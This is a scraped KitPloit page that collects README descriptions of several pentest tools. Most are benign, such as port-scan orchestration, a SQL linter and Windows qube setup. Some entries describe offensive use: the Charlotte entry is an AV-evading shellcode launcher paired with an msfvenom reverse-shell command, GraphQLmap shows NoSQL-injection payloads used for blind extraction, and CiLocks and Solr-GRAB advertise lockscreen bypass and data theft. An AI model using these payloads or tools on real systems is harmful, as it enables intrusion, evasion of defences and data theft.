Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

AutoPentest-DRL - Automated Penetration Testing Using Deep Reinforcement Learning

$
0
0


AutoPentest-DRL is an automated penetration testing framework based on Deep Reinforcement Learning (DRL) techniques. The framework determines the most appropriate attack path for a given network, and can be used to execute a simulated attack on that network via penetration testing tools, such as Metasploit. AutoPentest-DRL is being developed by the Cyber Range Organization and Design (CROND) NEC-endowed chair at the Japan Advanced Institute of Science and Technology (JAIST) in Ishikawa, Japan.

An overview of AutoPentest-DRL is shown below. The framework can use network scanning tools, such as Nmap, to find vulnerabilities in the target network; otherwise, user input is employed instead. The MulVAL attack-graph generator is used to determine potential attack trees, which are then fed in a simplified form into the DQN Decision Engine. The attack path that is produced as output can be fed into penetration testing tools, such as Metasploit, to conduct an attack on a real target network, or used with a logical network instead, for example for educational purposes. In addition, a topology generation algorithm is used to produce multiple network topologies that are used to train the DQN.


Next we provide brief information on how to setup and use AutoPentest-DRL. For details, please refer to the User Guide that we also make available.


Prerequisites

Several external tools are needed in order to use AutoPentest-DRL, as follows:

  • MulVAL: Attack-graph generator used by AutoPentest-DRL to produce possible attack paths for a given network. See the MulVAL page for installation instructions. MulVAL should be installed in the directory repos/mulval in the AutoPentest-DRL folder. You also need to configure the /etc/profile file as discussed here.

  • Nmap: Network scanner used by AutoPentest-DRL to determine vulnerabilities in a given real network. The command needed to install nmap on Ubuntu is given below:

    sudo apt-get install nmap
  • Metasploit: Penetration testing tools used by AutoPentest-DRL to actually conduct the attack proposed by the DQN engine on the real target network. To install Metasploit, you can use the installers made available on the Metasploit website. In addition, we use pymetasploit3 as RPC API to communicate with Metasploit, and this tool needs to be installed in the directory Penetration_tools/pymetasploit3 by following its author's instructions.


Setup

AutoPentest-DRL has been developed mainly on the Ubuntu 18.04 LTS operating system; other OSes may work, but have not been tested. In order to set up AutoPentest-DRL, use the releases page to download the latest version, and extract the source code archive into a directory of your choice (for instance, your home directory) on the host on which you intend to use it.

AutoPentest-DRL is implemented in Python, and it requires several packages to run. The file requirements.txt included with the distribution can be used to install the necessary packages via the following command that should be run from the AutoPentest-DRL/ directory:

$ sudo -H pip install -r requirements.txt

The last step is to install the database, which contains information about real hosts and vulnerabilities. For this purpose, download the asset file named database.tgz from the release page, and extract it into the Database/ directory.


Quick Start

The simplest way to use AutoPentest-DRL is to start it in the logical attack mode that will determine the optimal attack path for a given logical network. For more information about this and the other operation modes, real attack mode and training mode, see our User Guide.

In order to use the logical attack mode on a sample network topology, run the following command from a terminal window:

$ python3 ./AutoPentest-DRL.py logical_attack

The logical network topology used in this attack mode is described in the file MulVal_P/logical_attack.P, which includes details about the servers, their connections, and their vulnerabilities. This file can modified following the syntax described in the MulVAL documentation.

In the logical attack mode no actual attack is conducted, and only the optimal attack path is provided as output. By referring to the visualization of the attack graph that is generated by MulVAL in the file mulval_results/AttackGraph.pdf you can study in detail the attack steps. The figures below provide examples of such output.


References

For a research background regarding AutoPentest-DRL, please refer to the following paper:

  • Z. Hu, R. Beuran, Y. Tan, "Automated Penetration Testing Using Deep Reinforcement Learning", IEEE European Symposium on Security and Privacy Workshops (EuroS&PW 2020), Workshop on Cyber Range Applications and Technologies (CACOE'20), Genova, Italy, September 7, 2020, pp. 2-10.

For a list of contributors to this project, see the file CONTRIBUTORS included in the distribution.




DivideAndScan - Divide Full Port Scan Results And Use It For Targeted Nmap Runs

$
0
0


Divide Et Impera And Scan (and also merge the scan results)


DivideAndScan is used to efficiently automate port scanning routine by splitting it into 3 phases:

  1. Discover open ports for a bunch of targets.
  2. Run Nmap individually for each target with version grabbing and NSE actions.
  3. Merge the results into a single Nmap report (different formats available).

For the 1st phase a fastport scanner is intended to be used (Masscan / RustScan / Naabu), whose output is parsed and stored in a database (TinyDB). Next, during the 2nd phase individual Nmap scans are launched for each target with its set of open ports (multiprocessing is supported) according to the database data. Finally, in the 3rd phase separate Nmap outputs are merged into a single report in different formats (XML / HTML / simple text / grepable) with nMap_Merger.

Potential use cases:

  • Pentest engagements / red teaming with a large scope to enumerate.
  • Cybersecurity wargames / training CTF labs.
  • OSCP certification exam.

How It Works



How to Install

Prerequisites

To successfully divide and scan we need to get some good port scanning tools.

Note: if you don't feel like messing with dependecies on your host OS, skip to the Docker part.
Nmap
sudo apt install nmap sudo xsltproc -y
sudo nmap --script-updatedb

Masscan
cd /tmp
git clone https://github.com/robertdavidgraham/masscan.git
cd masscan
make
sudo make install
cd && rm -rf /tmp/masscan

RustScan
cd /tmp

wget -qO- https://api.github.com/repos/RustScan/RustScan/releases/latest \
| grep "browser_download_url.*amd64.deb" \
| cut -d: -f2,3 \
| tr -d \" \
| wget -qO rustscan.deb -i-

sudo dpkg -i rustscan.deb
cd && rm /tmp/rustscan.deb

sudo wget https://gist.github.com/snovvcrash/c7f8223cc27154555496a9cbb4650681/raw/a76a2c658370d8b823a8a38a860e4d88051b417e/rustscan-ports-top1000.toml -O /root/.rustscan.toml

Naabu
sudo mkdir /opt/projectdiscovery
cd /opt/projectdiscovery

wget -qO- https://api.github.com/repos/projectdiscovery/naabu/releases/latest \
| grep "browser_download_url.*linux-amd64.tar.gz" \
| cut -d: -f2,3 \
| tr -d \" \
| sudo wget -qO naabu.tar.gz -i-

sudo tar -xvzf naabu.tar.gz
sudo mv naabu-linux-amd64 naabu
sudo rm naabu.tar.gz README.md LICENSE.md
sudo ln -vs /opt/projectdiscovery/naabu /usr/local/bin/naabu

Installation

DivideAndScan is available on PyPI as divideandscan, though I recommend installing it from GitHub with pipx in order to always have the bleeding-edge version:

~$ pipx install -f "git+https://github.com/snovvcrash/DivideAndScan.git"
~$ das

For debbugging purposes you can set up a dev environment with poetry:

~$ git clone https://github.com/snovvcrash/DivideAndScan
~$ cd DivideAndScan
~$ poetry install
~$ poetry run das

Note: DivideAndScan uses sudo to run all the port scanners, so it will ask for the password when scanning commands are invoked.
Using from Docker

You can run DivideAndScan in a Docker container as follows:

~$ docker run -it --rm --name das -v `pwd`:/app snovvcrash/divideandscan

Since the tool requires some input data and produces some output data, you should specify your current working directory as the mount point at /app within the container. You may want to set an alias to make the base command shorter:

~$ alias das='docker run -it --rm --name das -v `pwd`:/app snovvcrash/divideandscan'
~$ das

How to Use



0. Preparations

Make a new directory to start DivideAndScan from. The tool will create subdirectories in CWD to store the output, so I recommend launching it from a clean directory to stay organized:

~$ mkdir divideandscan
~$ cd divideandscan

1. Filling the DB

Provide the add module a command for a fast port scanner to discover open ports in a desired range.

Warning: please, make sure that you understand what you're doing, because nearly all port scanning tools can damage the system being tested if used improperly.
# Masscan
~$ das add masscan '--rate 1000 -iL hosts.txt -p1-65535 --open'
# RustScan
~$ das add rustscan '-b 1000 -t 2000 -u 5000 -a hosts.txt -r 1-65535 -g --no-config'
# Naabu
~$ das add naabu '-rate 1000 -iL hosts.txt -p - -silent -s s'
# Nmap, -v flag is always required for correct parsing!
~$ das add nmap '-n -Pn --min-rate 1000 -T4 -iL hosts.txt -p1-65535 --open -v'

When the module completes its work, a hidden directory .db is created in CWD containig the database file and raw scan results.


2. Targeted Scanning

Launch targeted Nmap scans with the scan module. You can adjust the scan surface with either -hosts or -ports option:

# Scan by hosts
~$ das scan -hosts all -oA report1
~$ das scan -hosts 192.168.1.0/24,10.10.13.37 -oA report1
~$ das scan -hosts hosts.txt -oA report1
# Scan by ports
~$ das scan -ports all -oA report2
~$ das scan -ports 22,80,443,445 -oA report2
~$ das scan -ports ports.txt -oA report2

To start Nmap simultaneously in multiple processes, specify the -parallel switch and set number of workers with the -proc option (if no value is provided, it will default to the number of processors on the machine):

~$ das scan -hosts all -oA report -parallel [-proc 4]

The output format is selected with -oX, -oN, -oG and -oA options for XML+HTML formats, simple text format, grepable format and all formats respectively. When the module completes its work, a hidden directory .nmap is created in CWD containig Nmap raw scan reports.

Also, you can inspect the contents of the database with -show option before actually launching the scans:

~$ das scan -hosts all -show

3 (Optional). Merging the Reports

In order to generate a report independently of the scan module, you should use the report module. It will search for Nmap raw scan reports in the .nmap directory and process and merge them based on either -hosts or -ports option:

# Merge outputs by hosts
~$ das report -hosts all -oA report1
~$ das report -hosts 192.168.1.0/24,10.10.13.37 -oA report1
~$ das report -hosts hosts.txt -oA report1
# Merge outputs by ports
~$ das report -ports all -oA report2
~$ das report -ports 22,80,443,445 -oA report2
~$ das report -ports ports.txt -oA report2

Note: keep in mind that the report module does not search the DB when processing the -hosts or -ports options, but looks for Nmap raw reports directly in .nmap directory instead; it means that -hosts 127.0.0.1 argument value will be successfully resolved only if .nmap/127-0-0-1.* file exists, and -ports 80 argument value will be successfully resolved only if .nmap/port80.* file exists.

Help
usage: das [-h] {add,scan,report} ...

-----------------------------------------------------------------------------------------------
| ________ .__ .__ .___ _____ .____________ |
| \______ \ |__|__ _|__| __| _/____ / _ \ ____ __| _/ _____/ ____ _____ ____ |
| | | \| \ \/ / |/ __ |/ __ \ / /_\ \ / \ / __ |\_____ \_/ ___\\__ \ / \ |
| | ` \ |\ /| / /_/ \ ___// | \ | \/ /_/ |/ \ \___ / __ \| | \ |
| /_______ /__| \_/ |__\____ |\___ >____|__ /___| /\____ /_______ /\___ >____ /___| / |
| \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ |
| {@snovvcrash} {https://github.com/snovvcrash/DivideAndScan} {vX.Y.Z} |
-----------------------------------------------------------------------------------------------

positional arguments:
{add,scan,report}
add run a full port scan {masscan,rustscan,naabu,nmap} and add the output to DB
scan run targeted Nmap scans against hosts and ports from DB
report merge separate Nmap outputs into a single report in different formats

optional arguments:
-h, --help show this help message and exit

Psst, hey buddy... Wanna do some organized p0r7 5c4nn1n6?

ToDo


GraphQLmap - A Scripting Engine To Interact With A Graphql Endpoint For Pentesting Purposes

$
0
0


GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.


Install
$ git clone https://github.com/swisskyrepo/GraphQLmap
$ python graphqlmap.py
_____ _ ____ _
/ ____| | | / __ \| |
| | __ _ __ __ _ _ __ | |__ | | | | | _ __ ___ __ _ _ __
| | |_ | '__/ _` | '_ \| '_ \| | | | | | '_ ` _ \ / _` | '_ \
| |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
\_____|_| \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/
| | | |
|_| |_|
Author:Swissky Version:1.0
usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]]

optional arguments:
-h, --help show this help message and exit
-u URL URL to query : example.com/graphql?query={}
-v [VERBOSITY] Enable verbosity
--method [METHOD] HTTP Method to use interact with /graphql endpoint
--headers [HEADERS] HTTP Headers sent to /graphql endpoint
--json Send requests using POST and JSON

Features and examples

Examples are based on several CTF challenges from HIP2019.
Connect to a graphql endpoint
python3 graphqlmap.py -u https://yourhostname.com/graphql -v --method POST --headers '{"Authorization" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o"}'

Dump a GraphQL schema

Use dump_new to dump the GraphQL schema, this function will automaticly populate the "autocomplete" with the found fields.

Live Example

GraphQLmap > dump_new                     
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)

Query
doctor[]: email (String!),
doctors[Doctor]:
patients[Patient]:
patient[]: id (ID!),
allrendezvous[Rendezvous]:
rendezvous[]: id (ID!),
Doctor
id[ID]:
firstName[String]:
lastName[String]:
specialty[String]:
patients[None]:
rendezvous[None]:
email[String]:
password[String]:
[...]

Interact with a GraphQL endpoint

Write a GraphQL request and execute it.

GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}
{
"data": {
"doctors": [
{
"firstName": "Admin",
"id": "5d089c51dcab2d0032fdd08d",
"lastName": "Admin"
}
]
}
}

GraphQL field fuzzing

Use GRAPHQL_INCREMENT and GRAPHQL_CHARSET to fuzz a parameter.

Live Example

GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}}   
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi!\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi$\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi%\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi(\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi)\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi*\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi+\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi,\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi-\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi.\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi/\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi0\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi1\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi?\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}

NoSQLi injection

Use BLIND_PLACEHOLDER inside the query for the nosqli function.

Live Example

GraphQLmap > nosqli
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d
Charset > 0123456789abcdef-
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
GraphQLmap >

SQL injection
GraphQLmap > postgresqli
GraphQLmap > mysqli
GraphQLmap > mssqli

TODO
  • Docker with vulnerable GraphQL
  • Unit tests
  • Handle node
{
user {
edges {
node {
username
}
}
}
}


Charlotte - C++ Fully Undetected Shellcode Launcher

$
0
0


c++ fully undetected shellcode launcher ;)

releasing this to celebrate the birth of my newborn


description

13/05/2021:

  1. c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
  2. dynamic invoking of win32 api functions
  3. XOR encryption of shellcode and function names
  4. randomised XOR keys and variables per run
  5. on Kali Linux, simply 'apt-get install mingw-w64*' and thats it!

17/05/2021:

  1. random strings length and XOR keys length

antiscan.me



usage

git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py

example:

  1. git clone https://github.com/9emin1/charlotte.git&& apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
  4. python charlotte.py
  5. profit

tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload



update v1.1

17/05/21:

apparently MicrosoftWindows Defender was able to detect the .DLL binary,

and how did they flag it? by looking for several XOR keys of 16 byte size

changing it to 9 shown in the POC .gif below shows it is now undetected again

cheers!




SQLFluff - A SQL Linter And Auto-Formatter For Humans

$
0
0


SQLFluff is a dialect-flexible and configurable SQL linter. Designed with ELT applications in mind, SQLFluff also works with jinja templating and dbt. SQLFluff will auto-fix most linting errors, allowing you to focus your time on what matters.


Getting Started

To get started, install the package and run sqlfluff lint or sqlfluff fix.

$ pip install sqlfluff
$ echo " SELECT a + b FROM tbl; " > test.sql
$ sqlfluff lint test.sql
== [test.sql] FAIL
L: 1 | P: 1 | L003 | Single indentation uses a number of spaces not a multiple of 4
L: 1 | P: 14 | L006 | Operators should be surrounded by a single space unless at the start/end of a line
L: 1 | P: 27 | L001 | Unnecessary trailing whitespace

You can also have a play using SQLFluff online.

For full CLI usage and rules reference, see the docs.


Documentation

For full documentation visit docs.sqlfluff.com.


Releases

SQLFluff is in beta phase - expect the tool to change significantly with potentially non-backward compatible api and configuration changes in future releases. If you'd like to join in please consider contributing.

New releases are made monthly. For more information, visit Releases.


SQLFluff on Slack

We have a fast-growing community on Slack, come and join us!

https://join.slack.com/t/sqlfluff/shared_invite/zt-o1f4x0e8-pZzarAIlQmKj_6ZwD16w0g


Contributing

There's lots to do in this project, and we're just getting started. If you want to understand more about the architecture of SQLFluff, you can find more here.

If you'd like to contribute, check out the open issues on GitHub. You can also see the guide to contributing.



AMSITrigger - The Hunt For Malicious Strings

$
0
0


Hunting for Malicious Strings

Usage:
AMSI calls (xmas tree mode) -d, --debug Show Debug Info -m, --maxsiglength=VALUE Maximum signature Length to cater for, default=2048 -c, --chunksize=VALUE Chunk size to send to AMSIScanBuffer, default=4096 -h, -?, --help Show Help ">
-i, --inputfile=VALUE       Powershell filename
-u, --url=VALUE URL eg. https://10.1.1.1/Invoke-NinjaCopy.ps1
-f, --format=VALUE Output Format:
1 - Only show Triggers
2 - Show Triggers with Line numbers
3 - Show Triggers inline with code
4 - Show AMSI calls (xmas tree mode)
-d, --debug Show Debug Info
-m, --maxsiglength=VALUE Maximum signature Length to cater for,
default=2048
-c, --chunksize=VALUE Chunk size to send to AMSIScanBuffer,
default=4096
-h, -?, --help Show Help

For details see https://www.rythmstick.net/posts/amsitrigger



MurMurHash - Tool To Calculate A MurmurHash Value Of A Favicon To Hunt Phishing Websites On The Shodan Platform

$
0
0


This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform.


What is MurMurHash?

MurmurHash is a non-cryptographic hash function suitable for general hash-based lookup. The name comes from two basic operations, multiply (MU) and rotate (R), used in its inner loop. The current version is MurmurHash3 which yields a 32-bit or 128-bit hash value. When using 128-bits, the x86 and x64 versions do not produce the same values, as the algorithms are optimized for their respective platforms. MurmurHash3 was released alongside SMHasher—a hash function test suite.

Further reading on: https://en.wikipedia.org/wiki/MurmurHash


How to install?
git clone https://github.com/Viralmaniar/MurMurHash.git
cd MurMurHash
pip install -r requirements.txt
python MurMurHash.py

Detailed Blog:

https://isc.sans.edu/diary/Hunting+phishing+websites+with+favicon+hashes/27326


Hunting Phish Events for Paypal & Tesla:

After reading about hunting of phishing websites using favicon hashes I thought to generalise it to accept Favicon URLs for quick analysis on the Shodan.

Looking for a favicon icon file on the orginal website of Paypal:



Using MurMurHash.py file generating hash of the icon:



Searching on Shodan for Paypal phishing domains/IPs:


Validating Shodan results:

 


 

Now, let's search for Tesla icon on the original site:



Searching on Shodan for Tesla phishing domains/IPs:



 

Validating Shodan results:



Questions?

Twitter: @ManiarViral
LinkedIn: https://au.linkedin.com/in/viralmaniar



CiLocks - Android LockScreen Bypass

$
0
0


CiLocks - Android LockScreen Bypass


Features
  • Brute Pin 4 Digit
  • Brute Pin 6 Digit
  • Brute LockScreen Using Wordlist
  • Bypass LockScreen {Antiguard} Not Support All OS Version
  • Root Android {Supersu} Not Support All OS Version
  • Steal File
  • Reset Data

Required

- Adb {Android SDK}
- Cable Usb
- Android Emulator {NetHunter/Termux} Root
- Or Computer

Compatible

- Linux
- Windows
- Mac

Tested On

- Kali Linux

How To Run

- git clone https://github.com/tegal1337/CiLocks
- cd CiLocks
- chmod +x cilocks
- bash cilocks


For Android Emulator

- Install Busybox
- Root

If brute doesn't work then uncomment this code

`# adb shell input keyevent 26`
if 5x the wrong password will automatically delay 30 seconds

Solr-GRAB - Steal Apache Solr Instance Queries With Or Without A Username And Password

$
0
0


Steal Apache Solr instance Queries with or without a username and password.

DISCLAIMER: This project should be used for authorized testing and educational purposes only.


Download
git clone https://github.com/GnosticPlayers/Solr-GRAB

Usage

You can search for Apache Solr Instances via Censys, with the dork"Welcome To Solr" or "Apache Solr Admin". To grab queries, simply go to the http access point, sometimes being on port 80, 443 or 8080.

  • Replace "http://URLHERE/" with a desired URL, such as "http://127.0.0.1/".
  • Replace "PROJECTHERE/" with a desired project entry, such as a directory "users/".
  • Replace "IDHERE" with an ID that is unique per entry in JSON on the apache solr query, such as "id" or "global_id".
  • Lastly, replace "AMOUNTOFROWSHERE" with the amount of rows found in the query, such as "74332".

Now execute it with: bash index.sh.

Sometimes, you'll have an error where it's a 404 not found. If that's the case, add "/solr/" between "http://URLHERE/"& "PROJECTHERE", such as: https://127.0.0.1/solr/users/. This should fix the problem.


Author & Credits

Written by GnosticPlayers & g9648


g9648

Email: g9648@riseup.net


Gnostic Contacts

Email: dreammarket@riseup.net



Php_Code_Analysis - San your PHP code for vulnerabilities

$
0
0


This script will scan your code

the script can find

  1. check_file_upload issues
  2. host_header_injection
  3. SQl injection
  4. insecure deserialization
  5. open_redirect
  6. SSRF
  7. XSS
  8. LFI
  9. command_injection

features
  1. fast
  2. simple report

usage:
python code.py <file name> >>> this will scan one file
python code.py >>> this will scan full folder (.)
python code.py <path> >>> scan full folder

Qvm-Create-Windows-Qube - Spin Up New Windows Qubes Quickly, Effortlessly And Securely

$
0
0


qvm-create-windows-qube is a tool for quickly and conveniently installing fresh new Windows qubes with Qubes Windows Tools (QWT) drivers automatically. It officially supports Windows 7, 8.1 and 10 as well as Windows Server 2008 R2, 2012 R2, 2016 and 2019.

The project emphasizes correctness, security and treating Windows as an untrusted guest operating system throughout the entire process. It also features other goodies such as automatic installation of packages including Firefox, Office 365, Notepad++, Visual Studio and more using Chocolatey.


Installation
  1. Download the installation script by opening the link, right-clicking and then selecting "Save [Page] as..."
  2. Copy install.sh into Dom0 by running the following command in Dom0:
    • qvm-run -p --filter-escape-chars --no-color-output <qube_script_is_located_on> "cat '/home/user/Downloads/install.sh'" > install.sh
  3. Review the code of install.sh to ensure its integrity
    • Safer with escape character filtering enabled above; qvm-run disables it by default when output is a file
  4. Run chmod +x install.sh && ./install.sh
    • Note that this will install packages in the global default TemplateVM, which is fedora-XX by default
  5. Review the code of the resulting qvm-create-windows-qube.sh

A more streamlined and secure installation process with packaging will be shipping with Qubes R4.1.


Usage
Number of Windows qubes with given basename desired -t, --template Make this qube a TemplateVM instead of a StandaloneVM -n, --netvm <qube> NetVM for Windows to use -s, --seamless Enable seamless mode persistently across reboots -o, --optimize Optimize Windows by disabling unnecessary functionality for a qube -y, --spyless Configure Windows telemetry settings to respect privacy -w, --whonix Apply Whonix recommended settings for a Windows-Whonix-Workstation -p, --packages <packages> Comma-separated list of packages to pre-install (see available packages at: https://chocolatey.org/packages) -i, --iso <file> Windows media to automatically install and setup -a, --answer-file <xml file> Settings for Windows installation ">
Usage: ./qvm-create-windows-qube.sh [options] -i <iso> -a <answer file> <name>
-h, --help
-c, --count <number> Number of Windows qubes with given basename desired
-t, --template Make this qube a TemplateVM instead of a StandaloneVM
-n, --netvm <qube> NetVM for Windows to use
-s, --seamless Enable seamless mode persistently across reboots
-o, --optimize Optimize Windows by disabling unnecessary functionality for a qube
-y, --spyless Configure Windows telemetry settings to respect privacy
-w, --whonix Apply Whonix recommended settings for a Windows-Whonix-Workstation
-p, --packages <packages> Comma-separated list of packages to pre-install (see available packages at: https://chocolatey.org/packages)
-i, --iso <file> Windows media to automatically install and setup
-a, --answer-file <xml file> Settings for Windows installation

Downloading Windows ISO

The windows-media/isos/download-windows.sh script (in windows-mgmt) securely downloads the official Windows ISO to be used by qvm-create-windows-qube.


Creating Windows VM

Windows 10

./qvm-create-windows-qube.sh -n sys-firewall -oyp firefox,notepadplusplus,office365proplus -i win10x64.iso -a win10x64-pro.xml work-win10

./qvm-create-windows-qube.sh -n sys-firewall -oyp steam -i win10x64.iso -a win10x64-pro.xml game-console


Windows Server 2019

./qvm-create-windows-qube.sh -n sys-firewall -oy -i win2019-eval.iso -a win2019-datacenter-eval.xml fs-win2019


Windows 10 LTSC
  • A more stable, minified, secure and private version of Windows 10 officially provided by Microsoft

./qvm-create-windows-qube.sh -n sys-firewall -oyp firefox,notepadplusplus,office365proplus -i win10x64-ltsc-eval.iso -a win10x64-ltsc-eval.xml work-win10

./qvm-create-windows-qube.sh -n sys-whonix -oyw -i win10x64-ltsc-eval.iso -a win10x64-ltsc-eval.xml anon-win10


Windows 7
  • Not recommended because Windows 7 is no longer supported by Microsoft, however, it's the only desktop OS the Qubes GUI driver (in Qubes Windows Tools) supports if seamless window integration or dynamic resizing is required
  • See the Security > Windows > Advisories section below for more info

./qvm-create-windows-qube.sh -n sys-firewall -soyp firefox,notepadplusplus,office365proplus -i win7x64-ultimate.iso -a win7x64-ultimate.xml work-win7


Security

qvm-create-windows-qube is "reasonably secure" as Qubes would have it.

  • windows-mgmt is air gapped
  • The entirety of the Windows qube setup process happens is done air gapped
    • There is an exception for installing packages at the very end of the Windows qube installation
  • Entire class of command injectionvulnerabilities eliminated in the Dom0 shell script by not letting it parse any output from the untrusted windows-mgmt qube
    • Only exit codes are passed by qvm-run; no variables
    • This also mitigates the fallout of another Shellshock Bash vulnerability
  • Downloading of the Windows ISOs is made secure by enforcing:
    • ISOs are downloaded straight from Microsoft controlled subdomains of microsoft.com
    • HTTPS TLS 1.2/1.3
    • HTTP public key pinning (HPKP) to whitelist the website's certificate instead of relying on certificate authorities (CAs)
      • Qubes aims to "distrust the infrastructure"
      • Remember, transport security = encryption * authentication (This allows for the utmost authentication)
    • SHA-256 verification of the files after download
  • Windows is treated as an untrusted guest operating system the entire way through
  • All commits by the maintainers are always signed with their respective PGP keys
    • Should signing ever cease, assume compromise
    • Current maintainer 1: Elliot Killick
      • PGP key: 018F B9DE 6DFA 13FB 18FB 5552 F9B9 0D44 F83D D5F2
    • Current maintainer 2: Frédéric Pierret (No Keybase account)
      • PGP key: 9FA6 4B92 F95E 706B F28E 2CA6 4840 10B5 CDC5 76E2
      • Mostly concerned with Qubes R4.1 support
  • The impact of any theoretical vulnerabilities in handling of the Windows ISO (e.g. vulnerability in filesystem parsing) or answer file is limited to windows-mgmt

Windows

Maintenance

Don't forget to apply any applicable updates upon creation of your Windows qube. Microsoft frequently builds up-to-date ISOs for current versions of Windows, such as Windows 10. For these Windows versions, it's recommended to periodically visit the official Microsoft site download-windows.sh provides to get a fresh Windows image out of the box.


Advisories

Windows 7 and Windows Server 2008 R2 reached end of life (EOL) on January 14, 2020. Updates for these OSs are still available with Extended Security Updates (ESUs) if paid for. Office 365 for these OSs will continue getting security updates at no additional cost until January 2023.

If RDP is to be enabled on a Windows 7 qube (not default) then make sure it is fully up-to-date because the latest Windows 7 ISO Microsoft offers is unfortunately still vulnerable to BlueKeep and related DejaBlue vulnerabilities.

A critical vulnerability in Windows 10 and Windows Server 2016/2019 cryptography was recently disclosed. This allows any and all cryptography in these OSs (including HTTPS; the little padlock in your browser) to be easily intercepted. When Microsoft releases an updated ISO, the direct links in download-windows.sh will be updated but until then please update your qubes if they run the aforementioned OSs.


Privacy

qvm-create-windows-qube aims to be the most private way to use Windows. Many Qubes users switched from Windows (or another proprietary OS) in part to get away from Microsoft (or Big Tech in general) and so being able to use Windows from a safe distance is of utmost importance to this project. Or at least, as safe a distance as possible for what is a huge, proprietary binary blob.


Windows Telemetry

Configures Windows telemetry settings to respect privacy.

  • Opt-out of Customer Experience Improvement Program (CEIP)
  • Disable Windows Error Reporting (WER)
  • Disable DiagTrack service
  • Switch off all telemetry in Windows 10 "Settings" application
  • Enable "Security" level of telemetry on compatible editions of Windows 10
  • See spyless.bat for more info

Whonix Recommendations for Windows-Whonix-Workstation

Everything mentioned here up to "Even more security" is implemented. "Most security" is to use an official Whonix-Workstation built yourself from source. This feature is not official or endorsed by Whonix.

It's recommended to read this Whonix documentation to understand the implications of using Windows in this way.


Easy to Reset Fingerprint

There are countless unique identifiers present in every Windows installation such as the MachineGUID, installation ID, NTFS drive Volume Serial Numbers (VSNs) and more. With qvm-create-windows-qube, these unique identifiers can easily be reset by automatically reinstalling Windows.


Limitations

Fingerprinting is possible through the hypervisor in the event of VM compromise, here are some practical examples (not specific to Windows):

  • Xen clocksource as wallclock
    • Timezone leak can at least be mitigated by configuring UTC time in the BIOS/UEFI, the local timezone can still be configured for XFCE Dom0 clock
    • However, correlation between other VMs remains trivial
  • CPUID
  • Generally some of the VM interfaces documented here (e.g. screen dimensions)

Contributing

You can start by giving this project a star! High quality PRs are also welcome! Take a look at the todo list below if you're looking for things that need improvement. Other improvements such as more elegant ways of completing a task, code cleanup and other fixes are also welcome.

Lots of Windows-related GSoCs for those interested.

The logo of this project is by Max Andersen, used with written permission.

This project is the product of an independent effort that is not officially endorsed by Qubes OS.


Qubes Windows Tools Known Issues

Please send patches for these if you are able to. Although, be aware that Qubes Windows Tools is currently unmaintained.


All OSs

All OSs except Windows 7/Windows Server 2008 R2
  • Prompt to install earlier version of .NET
    • This only appears to be a cosmetic issue because qrexec services still work
    • Has been merged but QWT needs to be rebuilt to include it and there's currently no maintainer

Windows 10/Windows Server 2019
  • Private disk creation fails
    • Temporary fix: Close prepare-volume.exe window causing there to be no private disk (can't make a TemplateVM) but besides that Windows qube creation will continue as normal
    • Has been merged but QWT needs to be rebuilt to include it and there's currently no maintainer

Mailing list threads

Windows tagged Qubes OS GitHub issues

Todo
  • Gain the ability to reliably unpack/insert answer file/repack for any given ISO 9660 (Windows ISO format)
